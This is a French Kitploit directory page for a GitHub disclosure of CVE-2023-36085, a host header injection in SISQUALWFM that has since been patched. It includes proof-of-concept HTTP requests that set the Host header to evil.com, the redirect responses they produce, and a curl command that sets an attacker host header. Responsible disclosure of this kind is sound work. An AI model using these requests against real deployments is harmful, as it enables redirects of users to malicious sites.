Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
CVE-2023-36085_SISQUALWFM-Host-Header-Injection — This repository contains information related CVE-2023-36085 a host header injection vulnerability discovered in SISQUALWFM version 7.1.319.103, which allows an attacker to manipulate webpage links or redirect users to a malicious site. This vulnerability was assigned CVE-2023-36085 and has been fixed in version 7.1.319.111 and above. | Kitploit
Outils/GitHubGitHub/omershaik0/cve-2023-36085_sisqualwfm-host-header-injection
Vulnerability AnalysisExploitationWeb Application ExploitationInformation GatheringWeb SecurityPenetration Testing
GitHubomershaik0/cve-2023-36085_sisqualwfm-host-header-injection

CVE-2023-36085_SISQUALWFM-Host-Header-Injection

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Voir le dépôt
il y a 2 ansPas encore vérifié

À propos

This repository contains information related CVE-2023-36085 a host header injection vulnerability discovered in SISQUALWFM version 7.1.319.103, which allows an attacker to manipulate webpage links or redirect users to a malicious site. This vulnerability was assigned CVE-2023-36085 and has been fixed in version 7.1.319.111 and above.

Partager

CVE-2023-36085 Vulnérabilité d'injection d'en-tête d'hôte SISQUALWFM

Ce dépôt contient des informations relatives à une vulnérabilité d'injection d'en-tête d'hôte découverte dans SISQUALWFM version 7.1.319.103, qui permet à un attaquant de manipuler les liens de pages web ou de rediriger les utilisateurs vers un site malveillant. Cette vulnérabilité a reçu l'identifiant CVE-2023-36085 et a été corrigée dans la version 7.1.319.111 et ultérieures.

Détails de la vulnérabilité

  • Titre de l'exploit : Injection d'en-tête d'hôte SISQUALWFM 7.1.319.103
  • Date de découverte : 17/03/2023
  • Date de signalement : 17/03/2023
  • Date de résolution : 13/10/2023
  • Auteur de l'exploit : Omer Shaik (unknown_exploit)
  • Page d'accueil du fournisseur : SISQUALWFM
  • Version : 7.1.319.103
  • Testé sur : SISQUAL WFM 7.1.319.103
  • Version affectée : SISQUALWFM 7.1.319.103
  • Version corrigée : SISQUALWFM 7.1.319.111
  • CVE : CVE-2023-36085
  • Score CVSS : 3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
  • Catégorie : Applications Web

Preuve de concept

Nous fournissons un scénario de preuve de concept démontrant la vulnérabilité d'injection d'en-tête d'hôte, ciblant spécifiquement le point de terminaison /sisqualIdentityServer/core. Cette vulnérabilité permet à un attaquant de manipuler les liens de pages web ou de rediriger les utilisateurs vers un autre site en altérant l'en-tête d'hôte.

Requête originale

root@kitploit:~
GET /sisqualIdentityServer/core/login HTTP/2
Host: sisqualwfm.cloud
Cookie: <cookie>
...

Réponse originale

root@kitploit:~
HTTP/2 302 Found
Cache-Control: no-store, no-cache, must-revalidate
Location: https://sisqualwfm.cloud/sisqualIdentityServer/core/
...

Requête interceptée (modifiée pour rediriger vers evil.com)

root@kitploit:~
GET /sisqualIdentityServer/core/login HTTP/2
Host: evil.com
Cookie: <cookie>
...

Réponse

root@kitploit:~
HTTP/2 302 Found
Cache-Control: no-store, no-cache, must-revalidate
Location: https://evil.com/sisqualIdentityServer/core/
...

Exploit Execution

Méthode d'attaque

Pour exploiter cette vulnérabilité, un attaquant peut utiliser la commande curl suivante pour modifier l'en-tête d'hôte :

root@kitploit:~
curl -k --header "Host: attack.host.com" "Domain Name + /sisqualIdentityServer/core" -vvv

Avertissement

Ce dépôt est fourni à titre d'information uniquement et ne doit pas être utilisé pour des activités malveillantes. La vulnérabilité a été divulguée de manière responsable au fournisseur, et le problème a été résolu. Il est essentiel de suivre les directives de piratage éthique et de respecter les pratiques de divulgation responsable lors de l'identification et du signalement des vulnérabilités.

Télécharger l’outil